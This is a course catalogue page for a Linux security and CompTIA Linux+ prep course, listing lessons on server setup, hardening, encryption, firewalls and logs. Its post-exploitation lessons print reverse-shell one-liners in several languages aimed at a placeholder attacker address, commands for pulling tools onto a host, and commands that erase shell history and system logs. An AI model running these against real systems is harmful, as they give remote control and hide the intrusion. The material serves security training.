Linux For InfoSec & Comptia Linux+ Exam Prep

Or log in to access your purchased courses
COURSE DETAILS

The Linux for InfoSec Professionals course is a “Zero to Hero” style of training program designed to take someone with little to no Linux experience up to a highly competent Linux practitioner. It will not only teach you the security concepts and guidelines that will keep your Linux servers safe, it will walk you through hardening measures step-by-step.

This course also serves as a great prep guide for the Comptia Linux+ certification.

The CompTIA Linux+ certification covers common tasks in major distributions of Linux, including the Linux command line, basic maintenance, installing and configuring workstations, and networking. Linux+ is comprised of two exams – LX0-103 and LX0-104. Candidates must pass LX0-103 before taking LX0-104.

Unlike Security+ and Network+, you never have to renew the Linux+ certification. This accreditation is good for life. There are no Continuing Education (CE) requirements.

Course By

Joseph McCray

Lessons

C1L1: Getting Familiar with VMWare

Free Preview

For this workshop, the required prerequisite is the latest version of VMWare Workstation (Windows/Linux), Fusion (Mac), or Workstation Player(Windows/Linux). A 30-day trial of Workstation 12.1.1 can be downloaded from here: http://www.vmware.com/products/workstation/workstation-evaluation   A 30-day trial of Fusion 8 can be downloaded from here: https://www.vmware.com/products/fusion/fusion-evaluation.html   The newest version of VMWare Workstation Player 12.1.1 can be [...]

C1L2: Installing VMWare and setting up the InfoSec Addicts Ubuntu VM

All of the courses offered by InfoSec Addicts utilize Virtual Machines running on VMWare. If you do not own or want to purchase VMWare Workstation, you can download and install the latest VMWare Workstation Player for free. As of this writing (1/17/2017), both workstation and player are at version 12.5.2

C1L3: Installing VMware Workstation Player

INSTALLING VMWARE WORKSTATION PLAYER   First download the player from the following link: https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0   We are going to download the Windows version. The filename will default to the correct version and build number of the current release: Click Save to accept the default location and filename. If you do not want to use the [...]

C1L4: Download the InfoSec Addicts Virtual Machine

If not yet downloaded you can save it from the appropriate link for your class.   https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip Username: infosecaddicts Password:  infosecaddicts   Extract the contents to a suitable location for your Virtual Machines; you will use this in the next step. NOTE: We are performing this operation in VMWare Workstation Player 12.5.2 running on a [...]

C1L5: Adding the VM to VMWare Workstation Player

VMWARE CONFIGURATION   Double-click the VMware Icon on the desktop.  For the first time launching the program, you will be asked to enter a valid email address or license key. This will not occur on subsequent launches. Enter a Valid Email address or License Key as appropriate, then click on Continue: Click Finish to Launch [...]

C1L6: Download and install the attack VM

If you have not yet done, download and save it from the appropriate link for your class. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip Username: infosecaddicts Password:  infosecaddicts Extract the contained directory to a suitable location for your Virtual Machines; you will use this in the next step. NOTE: We are performing this operation in VMWare Workstation Player 12.1.1 running on [...]

C1L7: Launch VMware Workstation Player 12.5.2

Double-click the VMware Icon from the desktop.  Click on Open a Virtual Machine to browse for our Ubuntu VM. From the File, Open Screen Navigate to the location of your Virtual Machine and select the vmx file, then click Open to continue. Your VM is now loaded into the player in a Powered Off state. [...]

C1L8: Installing open-vm-tools

As we are working on a Linux variant (Ubuntu) that supports open-vm-tools via the repository, we can ignore the VMware warning to update the tools. Once installed they will be kept up-to-date with the daily system update. We can find more information here: http://kb.vmware.com/kb/2073803 From the command prompt type: sudo apt-get install open-vm-tools Enter ‘Y’ to continue. After a [...]

C1L9: Legacy installation of VMWare Tools – included for reference only.

At the bottom of the VM Machine, you should then see the following. Click Update Tools. You will be shown instructions on how to update them. The required media should have auto mounted, as evidenced by the icon. Click the icon to open the media in the File Manager. Right-Click on the VMWareTools package and [...]

C2L1: Basic Linux Commands

Let’s get started with some basic Linux commands. These commands provide a wealth of information to the pentester allowing them to successfully navigate and exploit the target system. To open a terminal in Linux hit ctrl alt + T or click the gear icon and type in “terminal”. pwd - print working directory, shows you your [...]

C2L2: The power of ls

THE POWER OF LS COMMAND The ls command is probably the most commonly used command and can provide lots of useful information. The ls (list) command lists information about the file(s) within a directory. The directory that you are currently working in will be the information listed by default. However, this can be manipulated to show data from other [...]

C2L3: How to find stuff in Linux

You’ll often find yourself looking for things. Here are some useful tips for just that. There are some commands that have proven useful for finding things in Linux. find is a popular command line tool that searches for files in the directory hierarchy. The command searches the current directory and recursively searches subdirectories for the supplied [...]

C2L4: What is Vim?

Vim is a text editor available in most Unix systems. It is an acronym for Vi Improved. Vim was originally developed by Bram Moolenaar as a clone of Bill Joy's vi editor for Unix. Originally developed for the Amiga, it has since grown to become a full-fledged text editor, provided with additional features designed to be helpful [...]

C2L5: Getting Started

First off, vim has a fairly extensive man page accessible with the following command: man vim - view the manual page for vim To begin with launch vim from a command prompt: vim   Or alternatively to begin editing a specific file: vim  You will be in the main editor screen. New File File directly opened [...]

C2L6: Modes within vim

Command mode - Otherwise the default mode when you launch or open a file in vim. This mode allows you to navigate around the file in a manner which does not alter the contents. It also allows you to enter various commands, such as insert, append, or delete. One of the biggest challenges new users to vim have is that [...]

C2L7: Basic Keyboard Commands

BASIC KEYBOARD COMMANDS All of these commands must be entered via Last Line mode, as such they will be preceded by the colon ‘ : ‘ character when listed below. All text contained within brackets ‘ [ ] ‘ is optional. :q[uit] Exit (or Quit) the current file :q[uit]! Exit (or Quit) the current file, aborting all [...]

C3L1: Basic Shell Scripting

BASIC SHELL SCRIPTING A Bash script is the plain text file that contains a series of commands. These commands are a mixture of commands we would normally type ourselves on the command line. Your "shell" also the command line interface is otherwise called (bash) Bourne Again Shell. There are hundreds of shells available for Linux [...]

C4L1: Module 4: Compiling & Debugging

C is a programming language, and it is not a scripting language like Shell. We need a compiler to compile C language in Linux operating system rather than the interpreter used by the shell. GCC is a very powerful compiler and simple to use for various linux distributions. To debug the C program, we need [...]

C5L1 Module 5: Getting familiar with Ubuntu

Let’s learn Ubuntu by building and configuring it. There are a few ways you can become familiar with Ubuntu or any flavor of Linux. Boot from a live CD (though this generally lacks persistence, so no changes are saved) Install and configure your machine. As most of us don’t have spare machines just sitting around, [...]

C5L2: Build the Ubuntu Perfect Server using Ubuntu 16.04

Before we can begin building the perfect server, we must first have a minimal installation up and running. For more info on this see: Download an appropriate image from http://releases.ubuntu.com/xenial/ Install using a tutorial such as: https://www.howtoforge.com/tutorial/ubuntu-minimal-server-install/ http://infosecaddicts.com/wp-content/uploads/2018/01/linuxserverimagedownload-1.mp4   http://infosecaddicts.com/wp-content/uploads/2018/01/linuxserverinstall.mp4

C5L3: Preliminary Information

We are using a domain of tps-ubuntu1604.example.com on IP address 192.168.10.139 with a Gateway address of 192.168.10.2. Be sure to change these to something more appropriate with your local environment. We have installed and are going to use vim to edit files. With the introduction of version 16.04, apt-get has been replaced by apt, which streamlines package management and removes the need to run apt-get autoremove to clean [...]

C5L4: Update Your Linux Installation

Keeping with best practices, let’s start by making sure our installation is up to date. sudo vim /etc/apt/sources.list Comment out, or remove, the installation CD from the file Make sure that the universe repository and multiverse repository are enabled To update the apt package database run sudo apt update And then install any updates with [...]

C5L5: Changing the default Shell

Default, the shell is set to /bin/dash. This will cause issues with later tools such as ISPConfig, so we need to change it to /bin/bash. sudo dpkg-reconfigure dash - Answer No. We can verify with a quick check. ls -alF   http://infosecaddicts.com/wp-content/uploads/2018/01/linuxshellchange.mp4

C5L6: Disable AppArmor

AppArmor is a SELinux extension meant to provide a stronger method of securing your server. To install ISPConfig, which we do later in this tutorial, we need to disable AppArmor. http://infosecaddicts.com/wp-content/uploads/2018/01/apparmorremove.mp4

C5L7: Synchronize the System Clock

Any time you run a server, especially one the has a public facing internet connection, it is critical that that time is in sync with the rest of the world. We can ensure this by running: sudo apt -y install ntp ntpdate http://infosecaddicts.com/wp-content/uploads/2018/01/ntpdate.mp4

C5L8: Install Postfix, Dovecot, MariaDB, rkhunter and binutils

Before we can install Postfix, we need to ensure sendmail is not present running. sudo service sendmail stop; sudo update-rc.d -f sendmail remove If you see an error on stopping sendmail, don’t worry. It just means that sendmail wasn’t running. Now we can install Postfix, Dovecot, MariaDB (a MySQL replacement), rkhunter, and binutils with a [...]

C5L9: Postfix – Manual Configurations

We want to open the SSH/TLS ports. Edit /etc/postfix/master.cf and uncomment the submission and smtps sections. Uncomment the first 3 lines and insert the following as the 4th line: sudo vim /etc/postfix/master.cf -o smtpd_client_restrictions=permit_sasl_authenticated,reject NOTE: The whitespace (indentation) in front of the -o lines is crucial to proper operations. When done editing the sections should [...]

C5L10: MariaDB – Manual Configurations

We want MySQL to listen on all the interfaces, not just the localhost. Edit /etc/mysql/mariadb.conf.d/50-server.cnf and comment out the line bind-address = 127.0.0.1: sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf Now we secure our installation. sudo mysql_secure_installation Set a new root MariaDB password that you can remember and accept the defaults for all other questions. Restart MariaDB with: sudo [...]

C5L11: Installing Amavisd-new, SpamAssassin, and Clamav

  We can install Amavisd-new, SpamAssassin, and ClamAV with one command: sudo apt -y install amavisd-new spamassassin clamav clamav-daemon zoo unzip bzip2 arj nomarch lzop cabextract apt-listchanges libnet-ldap-perl libauthen-sasl-perl clamav-docs daemon libio-string-perl libio-socket-ssl-perl libnet-ident-perl zip libnet-dns-perl postgrey Hmmm. Looks like all installed except for Amavisd-new. A quick look at systemctl status shows us that we [...]

C5L12: Installing Apache, PHP, phpMyAdmin, FCGI, SuExec, Pear

Installing Apache2, PHP 7, phpMyAdmin, FCGI, suExec, Pear, and mcrypt in a single command line. sudo apt -y install apache2 apache2-doc apache2-utils libapache2-mod-php php7.0 php7.0-common php7.0-gd php7.0-mysql php7.0-imap phpmyadmin php7.0-cli php7.0-cgi libapache2-mod-fcgid apache2-suexec-pristine php-pear php-auth php7.0-mcrypt mcrypt imagemagick libruby libapache2-mod-python php7.0-curl php7.0-intl php7.0-pspell php7.0-recode php7.0-sqlite3 php7.0-tidy php7.0-xmlrpc php7.0-xsl memcached php-memcache php-imagick php-gettext php7.0-zip Make sure to [...]

C5L13: PHP Opcode cache

A free PHP opcode cacher for caching as well as optimizing PHP intermediate code is strongly recommended to speed up your PHP pages. One such option is APCu. sudo apt -y install php7.0-opcache php-apcu Restart apache to enable the changes. http://infosecaddicts.com/wp-content/uploads/2018/01/C5L13.mp4

C5L14: PHP-FPM

To use PHP-FPM with Apache, we need to install the mod_fastcgi Apache module. NOTE: This is not the same as mod_fcgid. sudo apt -y install libapache2-mod-fastcgi php7.0-fpm Enable the module and then restart Apache to complete. sudo a2enmod actions fastcgi alias http://infosecaddicts.com/wp-content/uploads/2018/01/C5L141.mp4 http://infosecaddicts.com/wp-content/uploads/2018/01/C5L142.mp4

C5L15: Additional PHP Versions

Though it is possible to have multiple PHP versions on one server (selectable through ISPConfig), which will not be covered in this section. For more info on this, visit: https://www.howtoforge.com/how-to-use-multiple-php-versions-php-fpm-and-fastcgi-with-ispconfig-3-ubuntu-12.10 http://infosecaddicts.com/wp-content/uploads/2018/01/C5L15.mp4

C5L16: Installing Let’s Encrypt

  ISPConfig 3.1 is provided with builtin support for the free SSL Certificate Authority. Let's encrypt, allowing us to create free SSL certificate for use on our website(s). First, we add support for Let's encrypt. sudo mkdir /opt/certbot && cd /opt/certbot sudo wget https://dl.eff.org/certbot-auto sudo chmod a+x ./certbot-auto Run the certbot-auto command to download and [...]

C5L17: Install Mailman

ISPConfig allows us to manage Mailman mailing lists. To make use of this feature, we need to install Mailman. sudo apt -y install mailman Select at least one language and then OK to continue. Select OK and then create the mailman list. sudo newlist mailman Hit enter to continue and add the following aliases to [...]

C5L18: Install PureFTPd and Quota

PureFTPd and Quota can be installed together with the following command: sudo apt -y install pure-ftpd-common pure-ftpd-mysql quota quotatool Configure PureFTPd by editing /etc/default/pure-ftpd-common sudo vim /etc/default/pure-ftpd-common Set the start mode to standalone and VIRTUALCHROOT=true: As written, FTP is a very insecure protocol because all passwords and data are transferred in the clear. To increase security, we want [...]

C5L19: Installing BIND DNS Server

The BIND DNS Server will allow us to host our DNS entries for our example.com domain. sudo apt -y install bind9 dnsutils haveged We will setup our zone files in a later step. http://infosecaddicts.com/wp-content/uploads/2018/01/C5L19.mp4

C5L20: Installing Vlogger, Webalizer, and AWstats

Vlogger, Webalizer, and AWstats allow us to monitor and keep tabs on our server usage. Install them with: sudo apt -y install vlogger webalizer awstats geoip-database libclass-dbi-mysql-perl Edit /etc/cron.d/awstats and comment out everything. Sudo vim /etc/cron.d/awstats http://infosecaddicts.com/wp-content/uploads/2018/01/C5L20.mp4

C5L21: Installing Jailkit

Jailkit is only necessary if you need to chroot SSH users into their own/specific directories. It is a set of utilities used to limit user accounts to specific files using chroot() and or specific commands via a chroot shell session. If you want to use it, it must be installed BEFORE installing ISPConfig, not afterwards. sudo [...]

C5L22: Installing fail2ban and UFW

While these are optional, it is recommended to install them as ISPConfig monitor will attempt to log the results of them. Fail2ban is an Intrusion Detection System (IDS), monitors for and assists in automated blocking of brute-force attacks. UFW refers to Uncomplicated Firewall. First, install fail2ban: sudo apt -y install fail2ban Then create the following [...]

C5L23: Installing Roundcube Webmail

There are many webmail clients to choose from. Roundcube is one of the more popular so that we will install it in this tutorial. Install Roundcube Webmail with the following command: sudo apt -y install roundcube roundcube-core roundcube-mysql roundcube-plugins roundcube-plugins-extra javascript-common libjs-jquery-mousewheel php-net-sieve tinymce Roundcube requires a database. Just select Yes. Create a password to [...]

C5L24: Installing ISPConfig 3

Install the latest version of ISPConfig3 as follows: cd /tmp sudo wget -O ispconfig.tar.gz https://git.ispconfig.org/ispconfig/ispconfig3/rep... NOTE: The above is one complete command line sudo unzip ispconfig.tar.gz cd ispconfig3-master-e1ceb050e19c7574bca146a8da7047ee4ff456b5 cd install Running the installation script will configure ispconfig3 for all necessary daemons. Rolling out manual configuration. sudo php -q install.php Change any options as appropriate or [...]

C5L25: Install SSHFS

Frequently it becomes advantageous to work on and edit files from your VM (especially cloud-based instances) from your local machine. Perhaps you have a favorite IDE that is not available for or won’t run in a VM. To accomplish this, we need to mount the remote system locally and access via ssh. NOTE: As ssh [...]

C5L26: Installing SSHFS on Ubuntu

Install SSHFS: sudo apt-get install sshfs Mounting the Remote File System Create a local directory to mount the remote share, replacing “mount point” with something meaningful to your environment. If the directory already exists the command will fail and indicate so. sudo mkdir /mnt/mountpoint Now mount the remote share. sudo sshfs -o allow_other,defer_permissions [email protected]:/var/www /mnt/tps-web [...]

C5L27: Install Samba

Reference: http://www.krizna.com/ubuntu/setup-file-server-ubuntu-14-04-samba/ how to install samba on ubuntu sudo apt-get update sudo apt-get remove samba sudo apt-get install samba mkdir /home/infosecaddicts/samba sudo nano /etc/samba/smb.conf Then press Ctrl-O to save and Ctrl-X to exit from the nano text editor. sudo service smbd restart samba installation http://infosecaddicts.com/wp-content/uploads/2018/01/install-samba.webm Reference: http://www.krizna.com/ubuntu/setup-file-server-ubuntu-14-04-samba/

C5L28: Install Google 2 Factor Authentication

2 Factor Authentication (2FA), often referred to as Multifactor Authentication (MFA) is adding a layer of complexity to your authentication mechanism to help protect your systems or services. As the name implies, you need more than 1 layer of authentication factors to validate access. Typically this includes a combination of something you: Know - like [...]

C5L29: Installing libpam-google-authenticator

This adds Google implementation of PAM to your Linux machine. sudo apt-get install libpam-google-authenticator Generate a user key by running: google-authenticator As we are using a Google Authenticator, answer yes to: Do you want authentication tokens to be time-based (y/n) At this point a lot of output will scroll past, including a: QR Code secret [...]

C5L30: Configuring OpenSSH

Now that we have created a TOTP key, we need to configure SSH to use it. Edit the sshd configuration and add the following line to the end it. sudo vim /etc/pam.d/sshd auth required pam_google_authenticator.so nullok nullok at the end tells PAM that this authentication method is optional. This allows users without a TOTP key [...]

C5L31: Making SSH Aware of MFA

Look for PasswordAuthentication, uncomment it and change the “yes” to “no.” Add the following line underneath UsePam yes AuthenticationMethods publickey,keyboard-interactive Save and exit. Now edit the PAM sshd configuration file. sudo vim /etc/pam.d/sshd Find the line @include common-auth and comment it out. Save and close, then restart SSH sudo service ssh restart Try logging into the server [...]

C5L32: Install Mod_Security

What is Mod_Security? According to their website, “ModSecurity is another toolkit for monitoring real-time web applications, logging, and access control. Its also an enabler: there contain no hard rules telling you what to do; instead, its you to decide your path through the available features.” https://www.modsecurity.org/about.html Basically, it protects your website from various exploits such as Cross-Site Scripting, [...]

C5L33: Configuring Mod_Security Rules

Create the configuration file with: sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf Then edit the file with: sudo vim /etc/modsecurity/modsecurity.conf Activate the rules by editing and setting the ‘SecRuleEngine’ option to on: Ensure that SecRequestBodyLimit is set to a minimum of 10000000 and that SecRequestBodyNoFilesLimit & SecRequestBodyInMemoryLimit are set to 10% of SecRequestBodyLimit The available Mod_Security rules are here: /usr/share/modsecurity-crs/base_rules /usr/share/modsecurity-crs/optional_rules /usr/share/modsecurity-crs/experimental_rules To enable all [...]

C5L34: Configuring OWASP (Open Web Application Security Project)

Git clone or download and Install the OWASP core rule set for a base install. Be sure git is up-to-date sudo apt-get install git Clone the repository: sudo git clone <a href="https://github.com/SpiderLabs/owasp-modsecurity-crs.git">https://github.com/SpiderLabs/owasp-modsecurity-cr...</a> Move the existing modsecurity-crs to a backup copy, then replace it with the version just cloned. sudo mv /usr/share/modsecurity-crs /usr/share/modsecurity-crs.bak sudo mv owasp-modsecurity-crs [...]

C6L2: Preliminary Information

CentOS is a cloned version of the commercial Red Hat Linux distribution. This differs from that of the Ubuntu server which is considered a venerable Debian distribution. For this installation and configuration, we will be using the IP address 192.168.1.100/24 and 192.168.1.1 as the gateway address with server1.example.com as the hostname. A key difference between Ubuntu and CentOS is [...]

C6L3: Update Your Linux Installation

UPDATING YOUR LINUX INSTALLATION Keeping with best practices, let’s start by making sure our installation is up to date. su –c ‘yum update’ then use su –c ‘yum upgrade’ Since we are installing ISPConfig later on in this section, we will need to disable the default CentOS firewall. Let’s install net-tools: sudo yum –y install net-tools the –y [...]

C6L4: Disable SELinux

SELinux is a security extension that is intended to provide additional security to the system. This will be disabled because we are installing ISPConfig later on. Let’s edit the /etc/selinux/config and set SELINUX=disabled sudo vi /etc/selinux/config Now reboot the system using reboot. http://infosecaddicts.com/wp-content/uploads/2018/01/C6L4-Disable-SELinux.webm

C6L5: Enable Additional Repositories and Install Software

We need to import the GPG keys for software packages. To do this, run the following command: rpm –import /etc/pki/rpm-gpg/RPM-GPG-KEY* We now need to enable the EPEL (Extra Packages for Enterprise Linux) repository on our system. This is a repository from Fedora that provides high-quality add-on software packages for Red Hat Enterprise Linux distributions. yum [...]

C6L6: Quota

Disk quotas are used to alert a system admin when too much disk space is being used or when a partition becomes full. Individual Users and User groups can have quota configured. Quotas may also be used to control the number of inodes (data structures that contain information about files in UNIX file systems). Let’s [...]

C6L7: Enabling quota on the root partition

Quota is usually enabled in the /etc/fstab file. If the filesystem is the root filesystem “/”, then quota has to be enabled by the boot parameter of the Linux kernel. Let’s edit the grub configuration file. vi /etc/default/grub Look for a line that begins with GRUB_CMDLINE_LINUX and add rootflags=uquota,gquota to the end of the line inside the quote. Save [...]

C6L8: Enabling quota on a separate /var partition

If you have a separate /var partition, please refer to  https://www.howtoforge.com/tutorial/perfect-server-centos-7-2-apache-mysql-php-pureftpd-postfix-dovecot-and-ispconfig/ vi /etc/fstab _______________________________________________________________________________________________ # # /etc/fstab # Created by anaconda on Sun Sep 21 16:33:45 2014 # # Accessible filesystems, by reference, are maintained under '/dev/disk' # See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info # /dev/mapper/centos-root / xfs defaults 1 1 [...]

C6L9: Install Apache, MySQL (MariaDB), phpMyAdmin

Apache is an open source widely used web server that is fast, reliable, and secure. MySQL (MariaDB) is a free, open source Relational Database Management System that uses structured query language (SQL) for adding, accessing and managing data in a database. phpMyAdmin is an open source tool used to manage MySQL. All these services can [...]

C6L10: Install Dovecot

Dovecot is an IMAP and POP3 open source server for Linux. It is lightweight, fast and easy to setup mail server developed with security in mind. https://wiki.archlinux.org/index.php/dovecot To install Dovecot, use the following commands. yum –y install dovecot dovecot-mysql dovecot-pigeonhole Next, create an empty dovecot-sql.conf file and symbolic link. touch /etc/dovecot/dovecot-sql.conf ln –s /etc/dovecot/dovecot-sql.conf /etc/dovecot-sql.conf cd to [...]

C6L12: Install Postfix

Postfix is an open source mail transfer agent (MTA). This software is free under the IBM Public License 1.0. To install Postfix, use the following commands. yum –y install postfix Next turn off Sendmail and start Postfix and MySQL (MariaDB) systemctl enable mariadb.service systemctl start mariadb.service systemctl stop sendmail.service systemctl disable sendmail.service systemctl enable postfix.service [...]

C6L13: Install GetMail

GetMail is a mail retrieval agent implemented in Python. It is free software licensed under the GNU General Public License v2. Simply install Getmail as follows. yum –y install getmail Ubuntu http://infosecaddicts.com/wp-content/uploads/2018/01/C6L13-Install-GetMail.webm   Centos 7 http://infosecaddicts.com/wp-content/uploads/2018/01/C6L13-Install-GetMail-centos.webm  

C6L14: Set MySQL Passwords and Configure phpMyAdmin

It is important to set a complex password for the MySQL root account. We do this using: mysql_secure_installation At each prompt, enter the information requested for Set root password and the actual password. Hit enter for the next prompts that appear. Now, let’s configure phpMyAdmin. We want to allow connections to the MySQL (MariaDB) from [...]

C6L15: Install Amavisd-new, SpamAssassin, and ClamAV

  Amavisd-new is an interface that is used between an MTA and content checkers such as virus scanners and SpamAssassin. Written in Perl, it talks to the MTA via SMTP or LMTP. SpamAssassin is an open source anti-spam platform used to filter and block spam. ClamAV is an open source antivirus tool for Unix based [...]

C6L16: Installing Apache with mod_php, mod_fcgi/PHP5, PHP-FPM

In this lesson, we will be adding some features to our Apache server that will allow PHP and Apache to communicate better. This is installed for use with ISPConfig 3, which will get installed later. Install the following: yum -y install php php-devel php-gd php-imap php-ldap php-mysql php-odbc php-pear php-xml php-xmlrpc php-pecl-apc php-mbstring php-mcrypt php-mssql [...]

C6L17: Installation of mod_python

mod_python will need to be compiled from source code to run. mod_python is an apache module that embeds the Python interpreter in apache allowing the apache server to execute python. First let’s install the python development files as a tar.gz.file. yum -y install python-devel Now let’s change directories to /usr/local/src and download the file. wget http://dist.modpython.org/dist/mod_python-3.5.0.tgz Once [...]

C6L18: Install PureFTPD

PureFTPD is a free secure file transfer tool for Unix/Linux based systems. Let’s install the tool. Then start the tool yum -y install pure-ftpd systemctl enable pure-ftpd.service systemctl start pure-ftpd.service Let’s allow both FTP and TLS sessions. By allowing TLS, communications will be encrypted making the file transfer more secure. For TLS, we need to [...]

C7L1: Security Concepts – Permissions – Users & Groups

Module 7: Security Concepts - Permissions Intro to permissions Linux is a multi-user operating system that uses file ownership and permissions to provide security at the file system level. Linux has users and groups defined to apply the various security settings needed. Users & Groups There are five types of users that a Linux system has. These users have [...]

C7L2: Security Concepts – Permissions – Viewing ownership & permisions

Viewing ownership and permissions Permissions are given to every file in the file system. To view the permissions of a file or directory type: ls -l The above image shows the first 10 lines of the /home directory. Let’s break down what this is telling us. The mode breaks down the file type and permission [...]

C7L3: Security Concepts – Permissions – Modifying permissions

Modifying permissions Sometimes, the owner of a file needs to change who can do what with their files. This is achieved using following commands: chmod, chgrp, chown. chmod changes the mode bits of a file. chgrp modifies the group ownership of a file. chown changes the file owner and group. Reference(s): https://www.digitalocean.com/community/tutorials/an-introduction-to-linux-permissions https://linuxsecuritysolution.com/2013/02/10/linux-user-types/ http://infosecaddicts.com/wp-content/uploads/2018/01/C7L3-Security-Concepts-Permissions-Modifying-permissions.mp4  

C8L1: Security Concepts – Encryption – Symmetric Key Encryption

Symmetric Key Encryption Symmetric Key Encryption uses the same cryptographic key for both encryption of plaintext and decryption of ciphertext. Keys are either identical or have simple transformations between the two keys. The keys represent a shared secret between multiple parties used to maintain a private information link. The following walkthrough continues to show how [...]

C8L2: Security Concepts – Encryption – Asymmetric Key Encryption

Asymmetric Key Encryption Asymmetric Key Encryption, otherwise called as public key cryptography, uses both a private key and a public key to encrypt and decrypt data. Key pairs are generated using a cryptographic algorithm based on mathematical problems. Public keys are shared widely while the private key is only known the owner. Asymmetric encryption also [...]

C8L3: Security Concepts – Encryption – Encryption using OpenSSL

Encryption using OpenSSL OpenSSL is a software library used to secure communications against eavesdropping. OpenSSL contains an open-source implementation of SSL and TLS protocols. OpenSSL is a command line tool allowing a user to use the functions of the OpenSSL crypto library from the shell. openssl genrsa -out private_key.pem 1024 # generate RSA private key [...]

C9L1: Security Concepts – Firewall Concepts

What is IPTables? IPTables is the rule-based firewall utility that normally comes pre-installed Linux/Unix operating systems. IPTables inspects incoming and outgoing packets. The default structure for IPTables is Tables -> Chains-> Rules. IPTables contains 5 different tables where chains and rules are held. The filter and nat tables are the most commonly used tables. The [...]

C9L2: Security Concepts – Firewall Concepts – Demo

IPTables Demo We are familiar with the basics of IPTables let’s see how it can be used. If IPTables isn’t coming up, try upgrading your system using sudo apt upgrade. NOTE: Use sudo with the below commands. Commands can’t be run as a regular user. Reference(s): http://www.thegeekstuff.com/2011/06/iptables-rules-examples/ https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/3/html/Reference_Guide/s1-iptables-options.html Common commands used with IPTables iptables [] -A [...]

C11L1: Security Concepts – AppArmor

What is AppArmor? Reference(s): http://askubuntu.com/questions/236381/what-is-apparmor https://wiki.ubuntu.com/AppArmor https://help.ubuntu.com/community/AppArmor AppArmour is Kernel security module for Linux enforces Mandatory Access Control (MAC). This application allows a system administrator to restrict program capabilities with per-program profiles. These profiles are loaded into the kernel at system startup. AppArmor is an alternative application to SELinux and is included in Ubuntu There [...]

C12L1: Security Concepts – Log Analysis

Security Concepts - Log Analysis Linux log basics Reference(s): http://www.thegeekstuff.com/2011/08/linux-var-log-files/ https://help.ubuntu.com/community/LinuxLogFiles Linux log files are usually stored in the /var/log directory of the file system. These logs contain a wealth of information about what the system is doing or has done. Virtually everything done in a Linux system is logged in some form or fashion. [...]

C13L1: Let’s hack this StrategicSec VM

Module X: Let’s hack this StrategicSec VM We’ve done a bunch of other stuff - now let’s do what we came here to learn how to do. Let’s hack this StrategicSec VM. Let’s go for a quick SUID exploit. The SUID is the way UNIX- like systems run commands as another user without requiring credentials. [...]

C14L1: Security Concepts – Post Exploitation

Security Concepts - Post Exploitation Post exploitation basics The real skill in the world of hacking is NOT breaking into a machine - it’s staying on a compromised host. This is honestly the real dark arts of hacking. Getting files onto a system cat >> exploit.c << out tftp -i 72.29.77.15 nc wget http://www.learnsecurityonline.com/nc lynx [...]

C14L3 Security Concepts – Avoiding history & cleaning logs

Avoiding history & cleaning logs export HISTFILE=/dev/null or unset HISTFILE HISTSAVE HISTSIZE rm -rf /root/.bash_history ln -sf /dev/null /root/.bash_history rm -rf /var/log/messages ln -sf /dev/null /var/log/messages Removing entries from logs: grep -v $entry-to-remove $logfile > /tmp/a ; mv /tmp/a $logfile touch -r $file_with_timestamp_to_match $logfile Things to try: https://packetstormsecurity.com/files/128142/wtmpclean-0.8.1.html https://packetstormsecurity.com/files/118922/Last-Door-Log-Wiper.html http://www.lo0.ro/2011/08/09/gotroot-shell-script/ https://packetstormsecurity.com/files/112328/RopeADope-1.1-Linux-Log-Cleaner.html http://infosecaddicts.com/wp-content/uploads/2018/01/C14L3-Security-Concepts-Avoiding-history-cleaning-logs.mp4  

C14L4: Security Concepts – Breaking out of a restricted shell

Breaking out of a restricted shell https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/ https://blog.netspi.com/attacking-restricted-linux-shells/ http://infosecaddicts.com/wp-content/uploads/2018/06/C14L4-Security-Concepts-Breaking-out-of-a-restricted-shell-1.mp4  

C14L6: Security Concepts -Reverse Shells

Reverse Shells Bash bash -i >& /dev/tcp/$IP-ADDRESS/8080 0>&1 PERL perl -e 'use Socket;$i="$IP-ADDRESS";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Python Tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP-ADDRESS",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP php -r '$sock=fsockopen("$IP-ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby ruby -rsocket -e'f=TCPSocket.open("$IP-ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat Netcat is available rarely on production systems and even if [...]

C14L7: Security Concepts – Tunneling

Tunneling ICMP Tunneling: http://null-byte.wonderhowto.com/how-to/hack-like-pro-create-nearly-undetectable-covert-channel-with-tunnelshell-0155704/ http://log.lain.li/blog/setting-up-ip-over-icmp-with-hans/ DNS Tunneling: http://resources.infosecinstitute.com/dns-tunnelling/ https://zeltser.com/c2-dns-tunneling/ SSH Tunneling: http://u-tips-n-tricks.blogspot.com/2012/12/ssh-tunnel.html http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html http://www.linuxjournal.com/content/ssh-tunneling-poor-techies-vpn STunnel: https://www.digitalocean.com/community/tutorials/how-to-set-up-an-ssl-tunnel-using-stunnel-on-ubuntu Reverse SSH Tunneling: https://www.howtoforge.com/reverse-ssh-tunneling

C14L8: Security Concepts – Persistence

Persistence Simple Gawk backdoor: http://r00tsec1.blogspot.com/2012/07/a-backdoor-in-gawk-by-thegrugg.html Xinetd backdoor https://packetstormsecurity.com/files/26161/pure-xinetd-backdoor.c.html

C14L9: Security Concepts – Post Exploitation – Finding backdoors and rootkits

